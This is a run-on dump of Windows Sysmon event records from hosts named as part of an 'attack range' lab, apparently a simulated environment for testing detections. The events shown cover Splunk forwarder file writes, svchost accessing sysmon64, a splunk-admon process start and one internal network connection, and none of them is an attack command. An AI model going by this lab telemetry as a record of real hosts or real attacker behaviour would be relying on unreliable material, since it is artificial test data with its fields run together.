10:37:44.576{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89E9CF862574F393E113BAB3922E62D5,SHA256=0D9BE64C44F892C82E1A190F2BDFA1F8C611B0D4B7CD57F73177441F3E485089,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:44.531{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=433FE98FDBCDF9FB7ACB2723F9940307,SHA256=7D72241DF74D8CB6221CA2BFC3D08AB4E564DE43CC9F4A54C3F3917C935143EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:45.606{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E947780F52C7C36A1DCD309816CFCDA,SHA256=D04FA64FAE59620E8280879114B6FE8164304D717565E9071A6027D122933C71,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E79-6216-FD03-000000003902}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E79-6216-FD03-000000003902}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.812{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E79-6216-FD03-000000003902}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.813{4F8D34B0-0E79-6216-FD03-000000003902}3800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.687{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:42.580{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51185-false10.0.1.12-8000- 23542300x8000000000000000214352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.547{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBAD97AF8C831CC160C8DADB6CFA7B0,SHA256=121B92BE372F006428C0CD48B18B718724E63E525A6DAA7ED27799B3A698C1E3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E79-6216-FC03-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 